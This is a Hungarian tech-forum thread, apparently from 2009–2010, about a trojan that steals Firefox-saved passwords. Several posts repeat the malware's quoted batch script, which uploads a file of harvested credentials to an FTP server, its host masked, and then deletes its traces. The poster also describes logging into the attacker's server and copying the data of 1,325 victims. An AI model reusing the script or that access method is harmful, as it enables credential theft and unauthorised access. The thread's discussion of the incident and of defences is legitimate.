Sziasztok!
Az történt hogy be kaptam egy trójai vírust. Még idejében meg találtam, mielőtt tehette volna a dolgát. A nevét nem tudom, ne kérdezzétek. Azt csinálta volna, hogy a Firefoxban tárolt webcímeket és a hozzá tartozó felhasználóneveket és jelszavakat egy txt fájlba másolja, és elküldi egy ftp-re. Meg is van az ftp címe és belépési adatai. Be is léptem, és megtaláltam 1325 megfertőzött gép adatait, és a felhasználók adatait. Le mentettem őket a merevlemezemre, majd az ftp-ről töröltem. De már vannak új megfertőzött gépek. Szerintetek mit kellene tenni, vagy kinek kellene ez ügyben intézkedni?
1
Felhasználó adatokat ftp-re küldi a vírus.
Started by jancsi72, 2009.Nov.13. 16:06 PM
8 replies to this topic
#1
Posted 2009. November 13. 16:06 PM
#2
Posted 2009. November 13. 18:16 PM
Háát én ezért nem használok semmi automatikus űrlap kitöltő izét!
Semmi pass, stb nincs leírva sehova se a gépen.
Ami meg be van írva, az is kapcsolódik a bill-hez. Hozzá van rendelve egy gombhoz.
Na most nemtudom, ez mennyire biztonságosabb az ilyen billentyü leütés figyelő trójai ellen, mert nemtom, hogy akkor most ez is azt jelenti, hogy bepötyögöm a pass-t, vagy csak annyit log-ol, hogy PL G6. Aból meg fejtse vissza. Aztán meg alapból nem engedélyezek semmit se, hogy automatikusan belépjen oldalakon. Meg maxthon-t használok, sztem ez a legstabilabb, biztonságosabb. Benyomva win7 tüzfal, meg Eset SS 4.0. És mindent ellenőriz, amit letöltök. Letöltések nem nyitódnak meg, indulnak el automatikusan. Csak a vírusellenőrzés. Gyakran futtatok ccleanert, meg Advanced system Care-t.
Maxthonba meg miden előugró ablak, add-on ok, automatikus letöltés, reklámok, stb minden tiltva van. És a nod is max-ra van állítva, totális figyeléssel.
Nemtudom kinek kéne szólni ez esetben, de sztem csak úgy kezdj bele, ha eredeti progijaid vannak. Nehogy aztán a végén téged is ellenőrizzen az asva, meg megjelenjenek a rendőrök házkutatási parancsal, azt elvigyék a géped.
Érdekes, hogy meg tudtad találni az ftp-t, meg fel is tudtál rá csatlakozni, aztán meg törölni is tudtad a fenntlévő adatokat. De a trójait meg be tudtad kapni
Semmi pass, stb nincs leírva sehova se a gépen.
Ami meg be van írva, az is kapcsolódik a bill-hez. Hozzá van rendelve egy gombhoz.
Na most nemtudom, ez mennyire biztonságosabb az ilyen billentyü leütés figyelő trójai ellen, mert nemtom, hogy akkor most ez is azt jelenti, hogy bepötyögöm a pass-t, vagy csak annyit log-ol, hogy PL G6. Aból meg fejtse vissza. Aztán meg alapból nem engedélyezek semmit se, hogy automatikusan belépjen oldalakon. Meg maxthon-t használok, sztem ez a legstabilabb, biztonságosabb. Benyomva win7 tüzfal, meg Eset SS 4.0. És mindent ellenőriz, amit letöltök. Letöltések nem nyitódnak meg, indulnak el automatikusan. Csak a vírusellenőrzés. Gyakran futtatok ccleanert, meg Advanced system Care-t.
Maxthonba meg miden előugró ablak, add-on ok, automatikus letöltés, reklámok, stb minden tiltva van. És a nod is max-ra van állítva, totális figyeléssel.
Nemtudom kinek kéne szólni ez esetben, de sztem csak úgy kezdj bele, ha eredeti progijaid vannak. Nehogy aztán a végén téged is ellenőrizzen az asva, meg megjelenjenek a rendőrök házkutatási parancsal, azt elvigyék a géped.
Érdekes, hogy meg tudtad találni az ftp-t, meg fel is tudtál rá csatlakozni, aztán meg törölni is tudtad a fenntlévő adatokat. De a trójait meg be tudtad kapni
Asus M3N-HT Deluxe HDMI, AMD X4 Phenom 9950 BE, 4*1Gb Geil BD DDR2 1066MHz, XFX GTS250 1GB CORE E, 2*750Gb Samsung Sata2, Thermaltake Soprano FX, Logitech G15 & G9, Roccat Kave 5.1, Samsung XL2370
#3
Posted 2009. November 13. 18:21 PM
Dátum: jancsi72
Sziasztok!
Az történt hogy be kaptam egy trójai vírust. Még idejében meg találtam, mielőtt tehette volna a dolgát. A nevét nem tudom, ne kérdezzétek. Azt csinálta volna, hogy a Firefoxban tárolt webcímeket és a hozzá tartozó felhasználóneveket és jelszavakat egy txt fájlba másolja, és elküldi egy ftp-re. Meg is van az ftp címe és belépési adatai. Be is léptem, és megtaláltam 1325 megfertőzött gép adatait, és a felhasználók adatait. Le mentettem őket a merevlemezemre, majd az ftp-ről töröltem. De már vannak új megfertőzött gépek. Szerintetek mit kellene tenni, vagy kinek kellene ez ügyben intézkedni?
Az történt hogy be kaptam egy trójai vírust. Még idejében meg találtam, mielőtt tehette volna a dolgát. A nevét nem tudom, ne kérdezzétek. Azt csinálta volna, hogy a Firefoxban tárolt webcímeket és a hozzá tartozó felhasználóneveket és jelszavakat egy txt fájlba másolja, és elküldi egy ftp-re. Meg is van az ftp címe és belépési adatai. Be is léptem, és megtaláltam 1325 megfertőzött gép adatait, és a felhasználók adatait. Le mentettem őket a merevlemezemre, majd az ftp-ről töröltem. De már vannak új megfertőzött gépek. Szerintetek mit kellene tenni, vagy kinek kellene ez ügyben intézkedni?
ha a trójai nevét leírnád akkor mi is tudnánk hogy mi ellen kéne védekezni a trójaiak meg nem vírusok. ha tudod hogy ki az illető ip alapján a net szolgáltatót illetve atárhely szólgáltatót kellene értesíteni először.
Konfigom: cpu:Amd athlon2 p360(2.3GHz) ram: 4GB DDR3 vga: Ati Radeon HD 6470M 512MB(dedicated) OS:Ubuntu Studio 11.04
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)
#4
Posted 2009. November 13. 18:55 PM
A gépemen Program Files, Users mappa kivételével minden mappa és fájl rejtett. A c partíción megjelent egy fájl tmp kiterjesztéssel, néhány Kb. volt. Az ilyesmi eleve gyanús. Megnyitottam Jegyzettömbbel, és abban volt az ftp cím, a felhasználónév és a jelszó is, és egy elérési út egy fájlhoz, ami tartalmazta az adataimat. A Windows 7 tűzfala, kimenő engedélyt kért az ftp.exe számára, amit természetesen megtagadtam, innentől nem volt nehéz összerakni a helyzetet.
Igazából nem zavar, mert az én adataim nem kerültek ki.
Ha meg engem vesznek elő meg pláne.
Amúgy magyar felhasználóról, vagy arra utaló nyomokat nem találtam. De ez az eset mindenképpen figyelmet érdemel!
Ez volt a fájlban. A csillagokat én tettem bele.
del INET.LOG
echo open **********.com>>c:$.tmp
echo user tomsaw270>>c:$.tmp
echo 1231234>>c:$.tmp
echo cd /*******>>c:$.tmp
echo put "%UserProfile%%COMPUTERNAME%_FireFox.txt">>c:$.tmp
echo quit >>c:$.tmp
ftp -n -s:c:$.tmp
del c:$.tmp
del "%UserProfile%%COMPUTERNAME%_FireFox.txt"
Igazából nem zavar, mert az én adataim nem kerültek ki.
Ha meg engem vesznek elő meg pláne.
Amúgy magyar felhasználóról, vagy arra utaló nyomokat nem találtam. De ez az eset mindenképpen figyelmet érdemel!
Ez volt a fájlban. A csillagokat én tettem bele.
del INET.LOG
echo open **********.com>>c:$.tmp
echo user tomsaw270>>c:$.tmp
echo 1231234>>c:$.tmp
echo cd /*******>>c:$.tmp
echo put "%UserProfile%%COMPUTERNAME%_FireFox.txt">>c:$.tmp
echo quit >>c:$.tmp
ftp -n -s:c:$.tmp
del c:$.tmp
del "%UserProfile%%COMPUTERNAME%_FireFox.txt"
#5
Posted 2009. November 13. 19:30 PM
Dátum: jancsi72
A gépemen Program Files, Users mappa kivételével minden mappa és fájl rejtett. A c partíción megjelent egy fájl tmp kiterjesztéssel, néhány Kb. volt. Az ilyesmi eleve gyanús. Megnyitottam Jegyzettömbbel, és abban volt az ftp cím, a felhasználónév és a jelszó is, és egy elérési út egy fájlhoz, ami tartalmazta az adataimat. A Windows 7 tűzfala, kimenő engedélyt kért az ftp.exe számára, amit természetesen megtagadtam, innentől nem volt nehéz összerakni a helyzetet.
Igazából nem zavar, mert az én adataim nem kerültek ki.
Ha meg engem vesznek elő meg pláne.
Amúgy magyar felhasználóról, vagy arra utaló nyomokat nem találtam. De ez az eset mindenképpen figyelmet érdemel!
Ez volt a fájlban. A csillagokat én tettem bele.
del INET.LOG
echo open **********.com>>c:$.tmp
echo user tomsaw270>>c:$.tmp
echo 1231234>>c:$.tmp
echo cd /*******>>c:$.tmp
echo put "%UserProfile%%COMPUTERNAME%_FireFox.txt">>c:$.tmp
echo quit >>c:$.tmp
ftp -n -s:c:$.tmp
del c:$.tmp
del "%UserProfile%%COMPUTERNAME%_FireFox.txt"
Igazából nem zavar, mert az én adataim nem kerültek ki.
Ha meg engem vesznek elő meg pláne.
Amúgy magyar felhasználóról, vagy arra utaló nyomokat nem találtam. De ez az eset mindenképpen figyelmet érdemel!
Ez volt a fájlban. A csillagokat én tettem bele.
del INET.LOG
echo open **********.com>>c:$.tmp
echo user tomsaw270>>c:$.tmp
echo 1231234>>c:$.tmp
echo cd /*******>>c:$.tmp
echo put "%UserProfile%%COMPUTERNAME%_FireFox.txt">>c:$.tmp
echo quit >>c:$.tmp
ftp -n -s:c:$.tmp
del c:$.tmp
del "%UserProfile%%COMPUTERNAME%_FireFox.txt"
hm egyszerú bach scriptnek tűnik. nagy valószinüleg meg az is. a fenti parancsfájl kiterjesztése mire végződik?
Konfigom: cpu:Amd athlon2 p360(2.3GHz) ram: 4GB DDR3 vga: Ati Radeon HD 6470M 512MB(dedicated) OS:Ubuntu Studio 11.04
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)
#6
Posted 2010. February 08. 15:18 PM
Dátum: Bajgunar
Háát én ezért nem használok semmi automatikus űrlap kitöltő izét!
Semmi pass, stb nincs leírva sehova se a gépen.
Ami meg be van írva, az is kapcsolódik a bill-hez. Hozzá van rendelve egy gombhoz.
Na most nemtudom, ez mennyire biztonságosabb az ilyen billentyü leütés figyelő trójai ellen, mert nemtom, hogy akkor most ez is azt jelenti, hogy bepötyögöm a pass-t, vagy csak annyit log-ol, hogy PL G6. Aból meg fejtse vissza. Aztán meg alapból nem engedélyezek semmit se, hogy automatikusan belépjen oldalakon. Meg maxthon-t használok, sztem ez a legstabilabb, biztonságosabb. Benyomva win7 tüzfal, meg Eset SS 4.0. És mindent ellenőriz, amit letöltök. Letöltések nem nyitódnak meg, indulnak el automatikusan. Csak a vírusellenőrzés. Gyakran futtatok ccleanert, meg Advanced system Care-t.
Maxthonba meg miden előugró ablak, add-on ok, automatikus letöltés, reklámok, stb minden tiltva van. És a nod is max-ra van állítva, totális figyeléssel.
Nemtudom kinek kéne szólni ez esetben, de sztem csak úgy kezdj bele, ha eredeti progijaid vannak. Nehogy aztán a végén téged is ellenőrizzen az asva, meg megjelenjenek a rendőrök házkutatási parancsal, azt elvigyék a géped.
Érdekes, hogy meg tudtad találni az ftp-t, meg fel is tudtál rá csatlakozni, aztán meg törölni is tudtad a fenntlévő adatokat. De a trójait meg be tudtad kapni
Semmi pass, stb nincs leírva sehova se a gépen.
Ami meg be van írva, az is kapcsolódik a bill-hez. Hozzá van rendelve egy gombhoz.
Na most nemtudom, ez mennyire biztonságosabb az ilyen billentyü leütés figyelő trójai ellen, mert nemtom, hogy akkor most ez is azt jelenti, hogy bepötyögöm a pass-t, vagy csak annyit log-ol, hogy PL G6. Aból meg fejtse vissza. Aztán meg alapból nem engedélyezek semmit se, hogy automatikusan belépjen oldalakon. Meg maxthon-t használok, sztem ez a legstabilabb, biztonságosabb. Benyomva win7 tüzfal, meg Eset SS 4.0. És mindent ellenőriz, amit letöltök. Letöltések nem nyitódnak meg, indulnak el automatikusan. Csak a vírusellenőrzés. Gyakran futtatok ccleanert, meg Advanced system Care-t.
Maxthonba meg miden előugró ablak, add-on ok, automatikus letöltés, reklámok, stb minden tiltva van. És a nod is max-ra van állítva, totális figyeléssel.
Nemtudom kinek kéne szólni ez esetben, de sztem csak úgy kezdj bele, ha eredeti progijaid vannak. Nehogy aztán a végén téged is ellenőrizzen az asva, meg megjelenjenek a rendőrök házkutatási parancsal, azt elvigyék a géped.
Érdekes, hogy meg tudtad találni az ftp-t, meg fel is tudtál rá csatlakozni, aztán meg törölni is tudtad a fenntlévő adatokat. De a trójait meg be tudtad kapni
ez már kicsit paranoiás
egy kis tapasztalattal korán sem kell ennyi kényelmi funkcióról lemondani
#7
Posted 2010. February 08. 17:06 PM
Hááát, nem tudom. Nekem gyanús a történet.
Ha valaki olyan trójait tud írni, hogy észrevétlenül feltud menni a gépre, az elrejti a kapcsolódási paramétereket. Tehát nem fogod tudni egyszerűen megnézni sem azt hogy hova küldi az adatokat, sem a logint és sem a jelszót.
Aki ennyire amatör, hogy ilyen egyszerűen engedi magát visszakövetni, az arra is amatör, hogy észrevétlenül a gépedre jusson.
Tehát vagy nem kerek a történet, vagy nem neten keresztül került a gépre az okosság. Nem lehet, hogy valaki közvetlenül fért hozzá a géphez és egyszerűen feltette rá a "kis rosszindulatút"?
Ja és ha biztos vagy benne, hogy ez egy rosszindulatú kód ami a neten keresztül mászott be a gépre miért nem árulod el a pontos paramétereket, hogy mások is ellenőrízhessék? Ha tudjuk az ftp címet, akkor meg van a szerver és lenyomozható több lényeges adat is.
Ha valaki olyan trójait tud írni, hogy észrevétlenül feltud menni a gépre, az elrejti a kapcsolódási paramétereket. Tehát nem fogod tudni egyszerűen megnézni sem azt hogy hova küldi az adatokat, sem a logint és sem a jelszót.
Aki ennyire amatör, hogy ilyen egyszerűen engedi magát visszakövetni, az arra is amatör, hogy észrevétlenül a gépedre jusson.
Tehát vagy nem kerek a történet, vagy nem neten keresztül került a gépre az okosság. Nem lehet, hogy valaki közvetlenül fért hozzá a géphez és egyszerűen feltette rá a "kis rosszindulatút"?
Ja és ha biztos vagy benne, hogy ez egy rosszindulatú kód ami a neten keresztül mászott be a gépre miért nem árulod el a pontos paramétereket, hogy mások is ellenőrízhessék? Ha tudjuk az ftp címet, akkor meg van a szerver és lenyomozható több lényeges adat is.
#8
Posted 2010. February 08. 18:53 PM
Dátum: wix
Hááát, nem tudom. Nekem gyanús a történet.
Ha valaki olyan trójait tud írni, hogy észrevétlenül feltud menni a gépre, az elrejti a kapcsolódási paramétereket. Tehát nem fogod tudni egyszerűen megnézni sem azt hogy hova küldi az adatokat, sem a logint és sem a jelszót.
Aki ennyire amatör, hogy ilyen egyszerűen engedi magát visszakövetni, az arra is amatör, hogy észrevétlenül a gépedre jusson.
Tehát vagy nem kerek a történet, vagy nem neten keresztül került a gépre az okosság. Nem lehet, hogy valaki közvetlenül fért hozzá a géphez és egyszerűen feltette rá a "kis rosszindulatút"?
Ja és ha biztos vagy benne, hogy ez egy rosszindulatú kód ami a neten keresztül mászott be a gépre miért nem árulod el a pontos paramétereket, hogy mások is ellenőrízhessék? Ha tudjuk az ftp címet, akkor meg van a szerver és lenyomozható több lényeges adat is.
Ha valaki olyan trójait tud írni, hogy észrevétlenül feltud menni a gépre, az elrejti a kapcsolódási paramétereket. Tehát nem fogod tudni egyszerűen megnézni sem azt hogy hova küldi az adatokat, sem a logint és sem a jelszót.
Aki ennyire amatör, hogy ilyen egyszerűen engedi magát visszakövetni, az arra is amatör, hogy észrevétlenül a gépedre jusson.
Tehát vagy nem kerek a történet, vagy nem neten keresztül került a gépre az okosság. Nem lehet, hogy valaki közvetlenül fért hozzá a géphez és egyszerűen feltette rá a "kis rosszindulatút"?
Ja és ha biztos vagy benne, hogy ez egy rosszindulatú kód ami a neten keresztül mászott be a gépre miért nem árulod el a pontos paramétereket, hogy mások is ellenőrízhessék? Ha tudjuk az ftp címet, akkor meg van a szerver és lenyomozható több lényeges adat is.
ja ja azt jó lenne tudni a fenti adatok mik a csillagos részben csak hogy biztosak legyünk benne. mert így nagyon gyanús firefoxot meg max kiterjesztésen keresztül lehet neten keresztül fertőzni vagy a felhasználói profil kiolvasásával amihez meg ugye manuálisan vgy netről kéne bejőnnie a másik ami furcsa az az hogy nem írt róla hogy milyen virusírtót meg tűzfalat használ. valahogy nem tűnik hitelesnek a történet.
Konfigom: cpu:Amd athlon2 p360(2.3GHz) ram: 4GB DDR3 vga: Ati Radeon HD 6470M 512MB(dedicated) OS:Ubuntu Studio 11.04
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)
Mottó: Tedd vagy ne tedd de ne próbáldd! Yoda mester , Real time kernel is back! :)
#9
Posted 2010. February 08. 20:48 PM
wix, ja igazad van! ez így nagyon egyszerű lenne
meg jó lenne tudni hogy milyen védelem volt azon a gépen, vagy egyáltalán volt e!
meg jó lenne tudni hogy milyen védelem volt azon a gépen, vagy egyáltalán volt e!
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users